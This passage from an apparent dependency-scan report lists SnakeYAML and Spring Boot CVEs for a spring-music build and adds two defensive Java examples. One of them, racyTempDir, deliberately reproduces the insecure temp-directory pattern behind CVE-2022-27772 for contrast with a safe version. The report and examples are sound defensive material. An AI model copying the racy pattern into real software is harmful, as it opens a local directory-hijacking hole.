Base Score: HIGH (7.5)
Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H/E:3.9/RC:R/MAV:A
CVSSv2:
Base Score: MEDIUM (5.0)
Vector: /AV:N/AC:L/Au:N/C:N/I:N/A:P
References:
OSSINDEX - [CVE-2017-18640] CWE-776: Improper Restriction of Recursive Entity References in DTDs ('XML Entity Expansion')
OSSIndex - http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-18640
OSSIndex - https://bitbucket.org/asomov/snakeyaml/issues/377/allow-configuration-for-preventing-billion
Vulnerable Software & Versions:
CVE-2022-25857
The package org.yaml:snakeyaml from 0 and before 1.31 is vulnerable to Denial of Service (DoS) due to a missing nested depth limitation for collections.
CWE-776 Improper Restriction of Recursive Entity References in DTDs ('XML Entity Expansion')
CVSSv3:
Base Score: HIGH (7.5)
Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H/E:3.9/RC:R/MAV:A
References:
OSSINDEX - [CVE-2022-25857] CWE-776: Improper Restriction of Recursive Entity References in DTDs ('XML Entity Expansion')
OSSIndex - http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2022-25857
OSSIndex - https://bitbucket.org/snakeyaml/snakeyaml/issues/525
Vulnerable Software & Versions:
CVE-2022-38749
Using snakeYAML to parse untrusted YAML files may be vulnerable to Denial of Service attacks (DOS). If the parser is running on user supplied input, an attacker may supply content that causes the parser to crash by stack overflow.
CWE-787 Out-of-bounds Write, CWE-121 Stack-based Buffer Overflow
CVSSv3:
Base Score: MEDIUM (6.5)
Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H/E:2.8/RC:R/MAV:A
References:
Vulnerable Software & Versions:
CVE-2022-38751
Using snakeYAML to parse untrusted YAML files may be vulnerable to Denial of Service attacks (DOS). If the parser is running on user supplied input, an attacker may supply content that causes the parser to crash by stack overflow.
CWE-787 Out-of-bounds Write, CWE-121 Stack-based Buffer Overflow
CVSSv3:
Base Score: MEDIUM (6.5)
Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H/E:2.8/RC:R/MAV:A
References:
Vulnerable Software & Versions:
CVE-2022-38752
Applications using SnakeYAML to parse untrusted YAML files may be vulnerable to denial of service (DoS). If the parser runs on user-supplied input, an attacker may supply content that causes the parser to crash with a stack overflow. CWE-787 Out-of-bounds Write, CWE-121 Stack-based Buffer Overflow
CVSSv3:
Base Score: MEDIUM (6.5) Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H/E:2.8/RC:R/MAV:A References:
Vulnerable Software & Versions:
CVE-2022-41854
Applications using SnakeYAML to parse untrusted YAML files may be vulnerable to denial of service (DoS). If the parser runs on user-supplied input, an attacker may supply content that causes the parser to crash with a stack overflow. This effect may support a denial of service attack. CWE-787 Out-of-bounds Write, CWE-121 Stack-based Buffer Overflow
CVSSv3:
Base Score: MEDIUM (6.5) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H/E:2.8/RC:R/MAV:A References:
Vulnerable Software & Versions:
CVE-2022-38750
Applications using SnakeYAML to parse untrusted YAML files may be vulnerable to denial of service (DoS). If the parser runs on user-supplied input, an attacker may supply content that causes the parser to crash with a stack overflow. CWE-787 Out-of-bounds Write, CWE-121 Stack-based Buffer Overflow
CVSSv3:
Base Score: MEDIUM (5.5) Vector: CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H/E:1.8/RC:R/MAV:A References:
OSSINDEX - [CVE-2022-38750] CWE-121: Stack-based Buffer Overflow
OSSIndex - http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2022-38750
OSSIndex - https://bitbucket.org/snakeyaml/snakeyaml/issues/526/stackoverflow-oss-fuzz-47027
OSSIndex - https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=47027
Vulnerable Software & Versions:
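The five SnakeYAML findings above (CVE-2022-25857 and the four stack-overflow CVEs) share one precondition: the application hands attacker-controlled YAML to a parser that has no nesting, alias or size limits. The example below is added here and is not code from this report or from the spring-music project; it assumes org.yaml:snakeyaml 2.x, where the LoaderOptions limits introduced in 1.31/1.32 are available and SafeConstructor takes a LoaderOptions. It builds a bounded loader and feeds it a constructed, deeply nested flow sequence, which is rejected at the configured depth instead of recursing until the stack overflows. Note the caveat for this particular build: Spring Boot uses SnakeYAML to read application.yml, a trusted file, so these CVEs only become reachable where the application itself parses YAML it receives from users.

```java
import org.yaml.snakeyaml.LoaderOptions;
import org.yaml.snakeyaml.Yaml;
import org.yaml.snakeyaml.constructor.SafeConstructor;
import org.yaml.snakeyaml.error.YAMLException;

// Added example (not from the report or spring-music). Assumes org.yaml:snakeyaml 2.x on the classpath.
public class HardenedYamlLoader {

    // Loader with explicit resource bounds; each limit below is missing or unbounded in snakeyaml < 1.31.
    static Yaml hardened() {
        LoaderOptions opts = new LoaderOptions();
        opts.setNestingDepthLimit(20);          // cap collection nesting (CVE-2022-25857 and the stack-overflow CVEs)
        opts.setMaxAliasesForCollections(50);   // bound alias expansion ("billion laughs" style growth)
        opts.setAllowRecursiveKeys(false);      // recursive keys are never needed for data files
        opts.setCodePointLimit(1024 * 1024);    // refuse documents larger than 1 MiB
        // SafeConstructor only builds standard YAML types; it never instantiates classes named by !! tags.
        return new Yaml(new SafeConstructor(opts));
    }

    // Constructed input: a flow sequence nested `depth` levels deep, e.g. "[[[]]]" for depth 3.
    static String nestedSequence(int depth) {
        StringBuilder sb = new StringBuilder(depth * 2);
        for (int i = 0; i < depth; i++) sb.append('[');
        for (int i = 0; i < depth; i++) sb.append(']');
        return sb.toString();
    }

    // true if the loader accepts the document, false if it rejects it with a YAMLException
    // (the nesting-depth check throws from the composer before any deep recursion happens).
    static boolean accepts(Yaml yaml, String document) {
        try {
            yaml.load(document);
            return true;
        } catch (YAMLException e) {
            return false;
        }
    }

    public static void main(String[] args) {
        Yaml yaml = hardened();
        System.out.println("depth 10 accepted:   " + accepts(yaml, nestedSequence(10)));    // well inside the limit
        System.out.println("depth 1000 accepted: " + accepts(yaml, nestedSequence(1000)));  // far past the limit; rejected, not overflowed
    }
}
```

The same LoaderOptions object can be passed to `new Yaml(new Constructor(SomeType.class, opts))` when typed loading is required; the limits apply to the composer regardless of which constructor is used, but only SafeConstructor removes the arbitrary-class construction path.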
spring-music-sqldb-1.0.jar: spring-boot-2.0.1.RELEASE.jar
Description: Spring Boot
License: Apache License, Version 2.0: http://www.apache.org/licenses/LICENSE-2.0
File Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/spring-boot-2.0.1.RELEASE.jar
MD5: dc0f62283e9bfd0a0b3f7a7f4a8503af
SHA1: b8c5b14cbb0e52fdded8f98a8c1493cc74c7cf59
SHA256: 31dfbf9b801dbb428e128f5983b12b1efec7ceef19f0a8886c21423055e9a485
Evidence Type | Source | Name | Value | Confidence
Vendor | central | artifactid | spring-boot | Highest
Vendor | central | groupid | org.springframework.boot | Highest
Vendor | file | name | spring-boot | High
Vendor | hint analyzer | vendor | pivotal software | Highest
Vendor | hint analyzer | vendor | SpringSource | Highest
Vendor | hint analyzer | vendor | vmware | Highest
Vendor | jar | package name | boot | Highest
Vendor | jar | package name | boot | Low
Vendor | jar | package name | springframework | Low
Vendor | Manifest | automatic-module-name | spring.boot | Medium
Vendor | pom | artifactid | spring-boot | Low
Vendor | pom | developer email | info@pivotal.io | Low
Vendor | pom | developer name | Pivotal | Medium
Vendor | pom | developer org | Pivotal Software, Inc. | Medium
Vendor | pom | developer org URL | http://www.spring.io | Medium
Vendor | pom | groupid | org.springframework.boot | Highest
Vendor | pom | name | Spring Boot | High
Vendor | pom | organization name | Pivotal Software, Inc. | High
Vendor | pom | organization url | https://spring.io | Medium
Vendor | pom | parent-artifactid | spring-boot-parent | Low
Vendor | pom | url | https://projects.spring.io/spring-boot/#/spring-boot-parent/spring-boot | Highest
Product | central | artifactid | spring-boot | Highest
Product | file | name | spring-boot | High
Product | jar | package name | boot | Highest
Product | jar | package name | boot | Low
Product | Manifest | automatic-module-name | spring.boot | Medium
Product | Manifest | Implementation-Title | Spring Boot | High
Product | pom | artifactid | spring-boot | Highest
Product | pom | developer email | info@pivotal.io | Low
Product | pom | developer name | Pivotal | Low
Product | pom | developer org | Pivotal Software, Inc. | Low
Product | pom | developer org URL | http://www.spring.io | Low
Product | pom | groupid | org.springframework.boot | Highest
Product | pom | name | Spring Boot | High
Product | pom | organization name | Pivotal Software, Inc. | Low
Product | pom | organization url | https://spring.io | Low
Product | pom | parent-artifactid | spring-boot-parent | Medium
Product | pom | url | https://projects.spring.io/spring-boot/#/spring-boot-parent/spring-boot | Medium
Version | central | version | 2.0.1.RELEASE | Highest
Version | Manifest | Implementation-Version | 2.0.1.RELEASE | High
Version | pom | version | 2.0.1.RELEASE | Highest
Related Dependencies:
* spring-music-sqldb-1.0.jar: spring-boot-autoconfigure-2.0.1.RELEASE.jar
* spring-music-sqldb-1.0.jar: spring-boot-starter-2.0.1.RELEASE.jar
  File Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/spring-boot-starter-2.0.1.RELEASE.jar
  MD5: d1c30fdc178e996b300f44846e40d032
  SHA1: 33abc1286b0aabea4f08ff4285d09e587835a716
  SHA256: aefb7c105f0806dddea33391bbe841aa979a3d8f34cd9ad6d83f266b2182f347
  pkg:maven/org.springframework.boot/spring-boot-starter@2.0.1.RELEASE
* spring-music-sqldb-1.0.jar: spring-boot-starter-actuator-2.0.1.RELEASE.jar
* spring-music-sqldb-1.0.jar: spring-boot-starter-aop-2.0.1.RELEASE.jar
* spring-music-sqldb-1.0.jar: spring-boot-starter-data-jpa-2.0.1.RELEASE.jar
* spring-music-sqldb-1.0.jar: spring-boot-starter-data-mongodb-2.0.1.RELEASE.jar
* spring-music-sqldb-1.0.jar: spring-boot-starter-data-redis-2.0.1.RELEASE.jar
* spring-music-sqldb-1.0.jar: spring-boot-starter-jdbc-2.0.1.RELEASE.jar
* spring-music-sqldb-1.0.jar: spring-boot-starter-json-2.0.1.RELEASE.jar
* spring-music-sqldb-1.0.jar: spring-boot-starter-logging-2.0.1.RELEASE.jar
* spring-music-sqldb-1.0.jar: spring-boot-starter-tomcat-2.0.1.RELEASE.jar
CVE-2023-20873
In Spring Boot versions 3.0.0 - 3.0.5, 2.7.0 - 2.7.10, and older unsupported versions, an application that is deployed to Cloud Foundry could be susceptible to a security bypass. Users of affected versions should apply the following mitigation: 3.0.x users should upgrade to 3.0.6+. 2.7.x users should upgrade to 2.7.11+. Users of older, unsupported versions should upgrade to 3.0.6+ or 2.7.11+. NVD-CWE-noinfo
CVSSv3:
Base Score: CRITICAL (9.8) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H/E:3.9/RC:R/MAV:A References:
Vulnerable Software & Versions:
CVE-2022-27772
spring-boot versions prior to v2.2.11.RELEASE were vulnerable to temporary directory hijacking. This vulnerability affected the org.springframework.boot.web.server.AbstractConfigurableWebServerFactory.createTempDir method. NOTE: This vulnerability only affects products and/or versions that are no longer supported by the maintainer. CWE-668 Exposure of Resource to Wrong Sphere
CVSSv3:
Base Score: HIGH (7.8) Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H/E:1.8/RC:R/MAV:A CVSSv2:
Base Score: MEDIUM (4.6) Vector: /AV:L/AC:L/Au:N/C:P/I:P/A:P References:
Vulnerable Software & Versions:
CVE-2023-20883
In Spring Boot versions 3.0.0 - 3.0.6, 2.7.0 - 2.7.11, 2.6.0 - 2.6.14, 2.5.0 - 2.5.14 and older unsupported versions, there is potential for a denial-of-service (DoS) attack if Spring MVC is used together with a reverse proxy cache. CWE-400 Uncontrolled Resource Consumption
CVSSv3:
Base Score: HIGH (7.5) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H/E:3.9/RC:R/MAV:A References:
Vulnerable Software & Versions:
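CVE-2022-27772 is listed above for spring-boot, the artifact that actually contains AbstractConfigurableWebServerFactory, and is repeated below for each Spring Boot artifact in this build that matches the same CPE. createTempDir produces the directory the embedded servlet container is given as its base directory, so whoever controls it controls what the server unpacks and serves. The example below is added here and is not code from this report or from Spring Boot: it shows the create-file/delete/mkdir shape that this class of bug describes beside the one-step Files.createTempDirectory replacement, plus a permission check that can be run against any temporary directory an application creates. It assumes a POSIX file system; Files.getPosixFilePermissions throws UnsupportedOperationException on Windows.

```java
import java.io.File;
import java.io.IOException;
import java.nio.file.Files;
import java.nio.file.Path;
import java.nio.file.attribute.PosixFilePermission;
import java.util.EnumSet;
import java.util.Set;

// Added example (not from the report or Spring Boot). Contrasts the racy temp-directory pattern behind
// CVE-2022-27772 with the atomic replacement. Assumes a POSIX file system.
public class TempDirPatterns {

    // Racy shape: a name is allocated as a file, the file is deleted, then a directory is created at the same
    // path. Between delete() and mkdir() a local user can claim that path (for example with a symlink to a
    // directory they own); mkdir()'s boolean result is ignored, so the caller uses whatever is there. The
    // directory also gets umask-derived permissions (typically 0755) rather than owner-only access.
    static File racyTempDir(String prefix) throws IOException {
        File dir = File.createTempFile(prefix + ".", ".tmp");
        dir.delete();
        dir.mkdir();
        dir.deleteOnExit();
        return dir;
    }

    // Safe shape: Files.createTempDirectory creates the directory in a single call with a random name,
    // applies rwx------ on POSIX file systems, and retries with a new name if the path already exists
    // instead of silently adopting an existing entry.
    static Path safeTempDir(String prefix) throws IOException {
        Path dir = Files.createTempDirectory(prefix + ".");
        dir.toFile().deleteOnExit();
        return dir;
    }

    // Check to run against any temp directory an application creates: owner-only permissions and nothing else.
    static boolean ownerOnly(Path dir) throws IOException {
        Set<PosixFilePermission> perms = Files.getPosixFilePermissions(dir);
        return perms.equals(EnumSet.of(PosixFilePermission.OWNER_READ,
                                       PosixFilePermission.OWNER_WRITE,
                                       PosixFilePermission.OWNER_EXECUTE));
    }

    public static void main(String[] args) throws IOException {
        Path safe = safeTempDir("tomcat");
        System.out.println(safe + " owner-only: " + ownerOnly(safe));
        File racy = racyTempDir("tomcat");
        System.out.println(racy + " owner-only: " + ownerOnly(racy.toPath()));  // depends on the process umask
    }
}
```

On a running instance of an affected version the same check can be applied from the shell: locate the container's base directory under java.io.tmpdir and compare its mode and owner against the expectation above; a directory that is group- or world-writable, or owned by another user, is the condition the CVE describes.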
spring-music-sqldb-1.0.jar: spring-boot-actuator-2.0.1.RELEASE.jar
Description: Spring Boot Actuator
License: Apache License, Version 2.0: http://www.apache.org/licenses/LICENSE-2.0
File Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/spring-boot-actuator-2.0.1.RELEASE.jar
MD5: 271399ae372b316fe8f570ef292c8b8c
SHA1: aab310ca611fbdb3fe0f74f3f8644ee012abac8d
SHA256: a949f0f49820bbfe58ac2ddb987397ccc281f878e914321658de98d44ddc3007
Evidence Type | Source | Name | Value | Confidence
Vendor | central | artifactid | spring-boot-actuator | Highest
Vendor | central | groupid | org.springframework.boot | Highest
Vendor | file | name | spring-boot-actuator | High
Vendor | hint analyzer | vendor | pivotal software | Highest
Vendor | hint analyzer | vendor | SpringSource | Highest
Vendor | hint analyzer | vendor | vmware | Highest
Vendor | jar | package name | actuate | Low
Vendor | jar | package name | boot | Highest
Vendor | jar | package name | boot | Low
Vendor | jar | package name | springframework | Low
Vendor | Manifest | automatic-module-name | spring.boot.actuator | Medium
Vendor | pom | artifactid | spring-boot-actuator | Low
Vendor | pom | developer email | info@pivotal.io | Low
Vendor | pom | developer name | Pivotal | Medium
Vendor | pom | developer org | Pivotal Software, Inc. | Medium
Vendor | pom | developer org URL | http://www.spring.io | Medium
Vendor | pom | groupid | org.springframework.boot | Highest
Vendor | pom | name | Spring Boot Actuator | High
Vendor | pom | organization name | Pivotal Software, Inc. | High
Vendor | pom | organization url | https://spring.io | Medium
Vendor | pom | parent-artifactid | spring-boot-parent | Low
Vendor | pom | url | https://projects.spring.io/spring-boot/#/spring-boot-parent/spring-boot-actuator | Highest
Product | central | artifactid | spring-boot-actuator | Highest
Product | file | name | spring-boot-actuator | High
Product | jar | package name | actuate | Low
Product | jar | package name | boot | Highest
Product | jar | package name | boot | Low
Product | Manifest | automatic-module-name | spring.boot.actuator | Medium
Product | Manifest | Implementation-Title | Spring Boot Actuator | High
Product | pom | artifactid | spring-boot-actuator | Highest
Product | pom | developer email | info@pivotal.io | Low
Product | pom | developer name | Pivotal | Low
Product | pom | developer org | Pivotal Software, Inc. | Low
Product | pom | developer org URL | http://www.spring.io | Low
Product | pom | groupid | org.springframework.boot | Highest
Product | pom | name | Spring Boot Actuator | High
Product | pom | organization name | Pivotal Software, Inc. | Low
Product | pom | organization url | https://spring.io | Low
Product | pom | parent-artifactid | spring-boot-parent | Medium
Product | pom | url | https://projects.spring.io/spring-boot/#/spring-boot-parent/spring-boot-actuator | Medium
Version | central | version | 2.0.1.RELEASE | Highest
Version | Manifest | Implementation-Version | 2.0.1.RELEASE | High
Version | pom | version | 2.0.1.RELEASE | Highest
CVE-2023-20873
In Spring Boot versions 3.0.0 - 3.0.5, 2.7.0 - 2.7.10, and older unsupported versions, an application that is deployed to Cloud Foundry could be susceptible to a security bypass. Users of affected versions should apply the following mitigation: 3.0.x users should upgrade to 3.0.6+. 2.7.x users should upgrade to 2.7.11+. Users of older, unsupported versions should upgrade to 3.0.6+ or 2.7.11+. NVD-CWE-noinfo
CVSSv3:
Base Score: CRITICAL (9.8) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H/E:3.9/RC:R/MAV:A References:
Vulnerable Software & Versions:
CVE-2022-27772
spring-boot versions prior to v2.2.11.RELEASE were vulnerable to temporary directory hijacking. This vulnerability affected the org.springframework.boot.web.server.AbstractConfigurableWebServerFactory.createTempDir method. NOTE: This vulnerability only affects products and/or versions that are no longer supported by the maintainer. CWE-668 Exposure of Resource to Wrong Sphere
CVSSv3:
Base Score: HIGH (7.8) Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H/E:1.8/RC:R/MAV:A CVSSv2:
Base Score: MEDIUM (4.6) Vector: /AV:L/AC:L/Au:N/C:P/I:P/A:P References:
Vulnerable Software & Versions:
CVE-2023-20883
In Spring Boot versions 3.0.0 - 3.0.6, 2.7.0 - 2.7.11, 2.6.0 - 2.6.14, 2.5.0 - 2.5.14 and older unsupported versions, there is potential for a denial-of-service (DoS) attack if Spring MVC is used together with a reverse proxy cache. CWE-400 Uncontrolled Resource Consumption
CVSSv3:
Base Score: HIGH (7.5) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H/E:3.9/RC:R/MAV:A References:
Vulnerable Software & Versions:
CVE-2023-34055 (OSSINDEX)
In Spring Boot versions 2.7.0 - 2.7.17, 3.0.0-3.0.12 and 3.1.0-3.1.5, it is possible for a user to provide specially crafted HTTP requests that may cause a denial-of-service (DoS) condition.
Specifically, an application is vulnerable when all of the following are true:
* the application uses Spring MVC or Spring WebFlux
* org.springframework.boot:spring-boot-actuator is on the classpath
CWE-noinfo
CVSSv3:
Base Score: MEDIUM (6.5) Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H References:
Vulnerable Software & Versions (OSSINDEX):
cpe:2.3:a:org.springframework.boot:spring-boot-actuator:2.0.1.RELEASE:*:*:*:*:*:*:*
spring-music-sqldb-1.0.jar: spring-boot-actuator-autoconfigure-2.0.1.RELEASE.jar
Description: Spring Boot Actuator AutoConfigure
License: Apache License, Version 2.0: http://www.apache.org/licenses/LICENSE-2.0
File Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/spring-boot-actuator-autoconfigure-2.0.1.RELEASE.jar
MD5: d30318c5e0970493a5e15bd13604cf6a
SHA1: 794aa7d6b6e05563c69a4684d2f5b7c78e209b0a
SHA256: bfb3c9f00a34f150105d603c31556f3222cef6a7962eb08a93afc5d178e7a3b3
Evidence Type | Source | Name | Value | Confidence
Vendor | central | artifactid | spring-boot-actuator-autoconfigure | Highest
Vendor | central | groupid | org.springframework.boot | Highest
Vendor | file | name | spring-boot-actuator-autoconfigure | High
Vendor | hint analyzer | vendor | pivotal software | Highest
Vendor | hint analyzer | vendor | SpringSource | Highest
Vendor | hint analyzer | vendor | vmware | Highest
Vendor | jar | package name | actuate | Low
Vendor | jar | package name | autoconfigure | Highest
Vendor | jar | package name | boot | Highest
Vendor | jar | package name | boot | Low
Vendor | jar | package name | springframework | Low
Vendor | Manifest | automatic-module-name | spring.boot.actuator.autoconfigure | Medium
Vendor | pom | artifactid | spring-boot-actuator-autoconfigure | Low
Vendor | pom | developer email | info@pivotal.io | Low
Vendor | pom | developer name | Pivotal | Medium
Vendor | pom | developer org | Pivotal Software, Inc. | Medium
Vendor | pom | developer org URL | http://www.spring.io | Medium
Vendor | pom | groupid | org.springframework.boot | Highest
Vendor | pom | name | Spring Boot Actuator AutoConfigure | High
Vendor | pom | organization name | Pivotal Software, Inc. | High
Vendor | pom | organization url | https://spring.io | Medium
Vendor | pom | parent-artifactid | spring-boot-parent | Low
Vendor | pom | url | https://projects.spring.io/spring-boot/#/spring-boot-parent/spring-boot-actuator-autoconfigure | Highest
Product | central | artifactid | spring-boot-actuator-autoconfigure | Highest
Product | file | name | spring-boot-actuator-autoconfigure | High
Product | jar | package name | actuate | Low
Product | jar | package name | autoconfigure | Highest
Product | jar | package name | autoconfigure | Low
Product | jar | package name | boot | Highest
Product | jar | package name | boot | Low
Product | Manifest | automatic-module-name | spring.boot.actuator.autoconfigure | Medium
Product | Manifest | Implementation-Title | Spring Boot Actuator AutoConfigure | High
Product | pom | artifactid | spring-boot-actuator-autoconfigure | Highest
Product | pom | developer email | info@pivotal.io | Low
Product | pom | developer name | Pivotal | Low
Product | pom | developer org | Pivotal Software, Inc. | Low
Product | pom | developer org URL | http://www.spring.io | Low
Product | pom | groupid | org.springframework.boot | Highest
Product | pom | name | Spring Boot Actuator AutoConfigure | High
Product | pom | organization name | Pivotal Software, Inc. | Low
Product | pom | organization url | https://spring.io | Low
Product | pom | parent-artifactid | spring-boot-parent | Medium
Product | pom | url | https://projects.spring.io/spring-boot/#/spring-boot-parent/spring-boot-actuator-autoconfigure | Medium
Version | central | version | 2.0.1.RELEASE | Highest
Version | Manifest | Implementation-Version | 2.0.1.RELEASE | High
Version | pom | version | 2.0.1.RELEASE | Highest
CVE-2023-20873
In Spring Boot versions 3.0.0 - 3.0.5, 2.7.0 - 2.7.10, and older unsupported versions, an application that is deployed to Cloud Foundry could be susceptible to a security bypass. Users of affected versions should apply the following mitigation: 3.0.x users should upgrade to 3.0.6+. 2.7.x users should upgrade to 2.7.11+. Users of older, unsupported versions should upgrade to 3.0.6+ or 2.7.11+. NVD-CWE-noinfo
CVSSv3:
Base Score: CRITICAL (9.8) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H/E:3.9/RC:R/MAV:A References:
Vulnerable Software & Versions:
CVE-2022-27772
spring-boot versions prior to v2.2.11.RELEASE were vulnerable to temporary directory hijacking. This vulnerability affected the org.springframework.boot.web.server.AbstractConfigurableWebServerFactory.createTempDir method. NOTE: This vulnerability only affects products and/or versions that are no longer supported by the maintainer. CWE-668 Exposure of Resource to Wrong Sphere
CVSSv3:
Base Score: HIGH (7.8) Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H/E:1.8/RC:R/MAV:A CVSSv2:
Base Score: MEDIUM (4.6) Vector: /AV:L/AC:L/Au:N/C:P/I:P/A:P References:
Vulnerable Software & Versions:
CVE-2023-20883
In Spring Boot versions 3.0.0 - 3.0.6, 2.7.0 - 2.7.11, 2.6.0 - 2.6.14, 2.5.0 - 2.5.14 and older unsupported versions, there is potential for a denial-of-service (DoS) attack if Spring MVC is used together with a reverse proxy cache. CWE-400 Uncontrolled Resource Consumption
CVSSv3:
Base Score: HIGH (7.5) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H/E:3.9/RC:R/MAV:A References:
Vulnerable Software & Versions:
CVE-2025-22235 (OSSINDEX)
EndpointRequest.to() creates a matcher for null/** if the actuator endpoint, for which the EndpointRequest has been created, is disabled or not exposed.
Your application may be affected by this if all the following conditions are met:
* You use Spring Security
* EndpointRequest.to() has been used in a Spring Security chain configuration
* The endpoint which EndpointRequest references is disabled or not exposed via web
* Your application handles requests to /null and this path needs protection
You are not affected if any of the following is true:
* You don't use Spring Security
* You don't use EndpointRequest.to()
* The endpoint which EndpointRequest.to() refers to is enabled and is exposed
* Your application does not handle requests to /null or this path does not need protection
Sonatype's research suggests that this CVE's details differ from those defined at NVD. See https://ossindex.sonatype.org/vulnerability/CVE-2025-22235 for details. CWE-20 Improper Input Validation
CVSSv4:
Base Score: MEDIUM (6.3) Vector: CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N References:
Vulnerable Software & Versions (OSSINDEX):
cpe:2.3:a:org.springframework.boot:spring-boot-actuator-autoconfigure:2.0.1.RELEASE:*:*:*:*:*:*:*
spring-music-sqldb-1.0.jar: spring-boot-starter-web-2.0.1.RELEASE.jar
Description: Starter for building web, including RESTful, applications using Spring MVC. Uses Tomcat as the default embedded container
License: Apache License, Version 2.0: http://www.apache.org/licenses/LICENSE-2.0
File Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/spring-boot-starter-web-2.0.1.RELEASE.jar
MD5: 482276ec84e454e3549584bafb755987
SHA1: 88751ed76791d12425ce5a80476baf1749a44cf4
SHA256: 814f0a24d379bca0118c92bb0d6cac34497ab8f79a9bfe62fb46e8dc118ae94c
Evidence Type | Source | Name | Value | Confidence
Vendor | central | artifactid | spring-boot-starter-web | Highest
Vendor | central | groupid | org.springframework.boot | Highest
Vendor | file | name | spring-boot-starter-web | High
Vendor | hint analyzer | vendor | pivotal software | Highest
Vendor | hint analyzer | vendor | SpringSource | Highest
Vendor | hint analyzer | vendor | vmware | Highest
Vendor | Manifest | automatic-module-name | spring.boot.starter.web | Medium
Vendor | pom | artifactid | spring-boot-starter-web | Low
Vendor | pom | developer email | info@pivotal.io | Low
Vendor | pom | developer name | Pivotal | Medium
Vendor | pom | developer org | Pivotal Software, Inc. | Medium
Vendor | pom | developer org URL | http://www.spring.io | Medium
Vendor | pom | groupid | org.springframework.boot | Highest
Vendor | pom | name | Spring Boot Web Starter | High
Vendor | pom | organization name | Pivotal Software, Inc. | High
Vendor | pom | organization url | https://spring.io | Medium
Vendor | pom | parent-artifactid | spring-boot-starters | Low
Vendor | pom | url | https://projects.spring.io/spring-boot/#/spring-boot-parent/spring-boot-starters/spring-boot-starter-web | Highest
Product | central | artifactid | spring-boot-starter-web | Highest
Product | file | name | spring-boot-starter-web | High
Product | Manifest | automatic-module-name | spring.boot.starter.web | Medium
Product | Manifest | Implementation-Title | Spring Boot Web Starter | High
Product | pom | artifactid | spring-boot-starter-web | Highest
Product | pom | developer email | info@pivotal.io | Low
Product | pom | developer name | Pivotal | Low
Product | pom | developer org | Pivotal Software, Inc. | Low
Product | pom | developer org URL | http://www.spring.io | Low
Product | pom | groupid | org.springframework.boot | Highest
Product | pom | name | Spring Boot Web Starter | High
Product | pom | organization name | Pivotal Software, Inc. | Low
Product | pom | organization url | https://spring.io | Low
Product | pom | parent-artifactid | spring-boot-starters | Medium
Product | pom | url | https://projects.spring.io/spring-boot/#/spring-boot-parent/spring-boot-starters/spring-boot-starter-web | Medium
Version | central | version | 2.0.1.RELEASE | Highest
Version | Manifest | Implementation-Version | 2.0.1.RELEASE | High
Version | pom | version | 2.0.1.RELEASE | Highest
CVE-2023-20873
In Spring Boot versions 3.0.0 - 3.0.5, 2.7.0 - 2.7.10, and older unsupported versions, an application that is deployed to Cloud Foundry could be susceptible to a security bypass. Users of affected versions should apply the following mitigation: 3.0.x users should upgrade to 3.0.6+. 2.7.x users should upgrade to 2.7.11+. Users of older, unsupported versions should upgrade to 3.0.6+ or 2.7.11+. NVD-CWE-noinfo
CVSSv3:
Base Score: CRITICAL (9.8) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H/E:3.9/RC:R/MAV:A References:
Vulnerable Software & Versions:
CVE-2022-27772
spring-boot versions prior to v2.2.11.RELEASE were vulnerable to temporary directory hijacking. This vulnerability affected the org.springframework.boot.web.server.AbstractConfigurableWebServerFactory.createTempDir method. NOTE: This vulnerability only affects products and/or versions that are no longer supported by the maintainer. CWE-668 Exposure of Resource to Wrong Sphere
CVSSv3:
Base Score: HIGH (7.8) Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H/E:1.8/RC:R/MAV:A CVSSv2:
Base Score: MEDIUM (4.6) Vector: /AV:L/AC:L/Au:N/C:P/I:P/A:P References:
Vulnerable Software & Versions:
CVE-2023-20883
In Spring Boot versions 3.0.0 - 3.0.6, 2.7.0 - 2.7.11, 2.6.0 - 2.6.14, 2.5.0 - 2.5.14 and older unsupported versions, there is potential for a denial-of-service (DoS) attack if Spring MVC is used together with a reverse proxy cache. CWE-400 Uncontrolled Resource Consumption
CVSSv3:
Base Score: HIGH (7.5) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H/E:3.9/RC:R/MAV:A References:
Vulnerable Software & Versions:
